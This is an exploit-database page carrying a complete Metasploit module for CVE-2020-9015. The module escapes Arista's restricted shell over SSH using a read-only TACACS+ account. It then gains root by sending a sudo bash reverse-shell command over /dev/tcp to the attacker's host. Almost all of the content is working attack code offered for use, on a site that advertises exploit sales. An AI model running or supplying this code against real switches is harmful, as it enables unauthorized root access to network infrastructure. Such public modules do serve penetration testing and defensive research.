0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Arista Restricted Shell Escape / Privilege Escalation Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Arista restricted shell escape (with privesc)',
'Description' => %q{
This exploit module takes advantage of a poorly configured TACACS+ config,
Arista's bash shell and TACACS+ read-only account to privilage escalate.
A CVSS v3 base score of 9.8 has been assigned.
},
'License' => MSF_LICENSE,
'Author' => ['Chris Anders'],
'References' =>
[
[ 'CVE', '2020-9015'],
[ 'URL', 'http://www.securitybytes.me/posts/cve-2020-9015/'],
[ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015' ],
[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9015' ],
],
'Arch' => ARCH_X86,
'ConnectionType' => 'find',
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'Payload' => 'linux/x86/shell_reverse_tcp'
},
'DisclosureDate' => 'Feb 02 2020',
'Platform' => 'linux',
'PayloadType' => 'cmd_interact',
'Privileged' => true,
'Targets' => [ [ 'Universal', {} ] ]
)
)
register_options(
[
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'Username to login with', '']),
OptString.new('PASSWORD', [true, 'Password to login with', '']),
]
)
register_advanced_options(
[
Opt::Proxies,
OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),
OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', false])
]
)
end
def check
factory = ssh_socket_factory
opts = {
auth_methods: ['password', 'keyboard-interactive'],
port: rport,
use_agent: false,
config: false,
password: password,
proxy: factory,
non_interactive: true,
verify_host_key: :never
}
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(rhost, username, opts)
end
rescue Rex::ConnectionError
return CheckCode::Safe
rescue Net::SSH::Disconnect, ::EOFError
return CheckCode::Safe
rescue Timeout::Error
return CheckCode::Safe
rescue Net::SSH::AuthenticationFailed
return CheckCode::Safe
rescue Net::SSH::Exception
return CheckCode::Safe
end
CheckCode::Detected
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def lport
datastore['LPORT']
end
def lhost
datastore['LHOST']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def exploit
factory = ssh_socket_factory
opts = {
auth_methods: ['password', 'keyboard-interactive'],
port: rport,
use_agent: false,
config: false,
password: password,
proxy: factory,
non_interactive: true,
verify_host_key: :never
}
opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, opts)
end
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
rescue ::Timeout::Error
fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
end
fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
begin
payload_executed = false
print_good('SSH connection established.')
ssh.open_channel do |channel, _data|
print_status('Requesting pty rbash')
channel.request_pty do |ch, success|
fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
print_good('PTY successfully obtained.')
print_status('Requesting a shell.')
ch.send_channel_request('shell') do |cha, _succ|
fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
print_good('Spawned into arista rbash shell.')
cha.on_data do |_xx, data2|
if data2.include? '#'
if !payload_executed
print_status('Attempting to break out of Arista rbash...')
channel.send_data("show run | grep '' | sudo bash -c 'bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1 2>&1 &'\n")
payload_executed = true
print_good('Escaped from rbash!')
end
end
end
end
end
end
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
# 0day.today [2024-11-15] #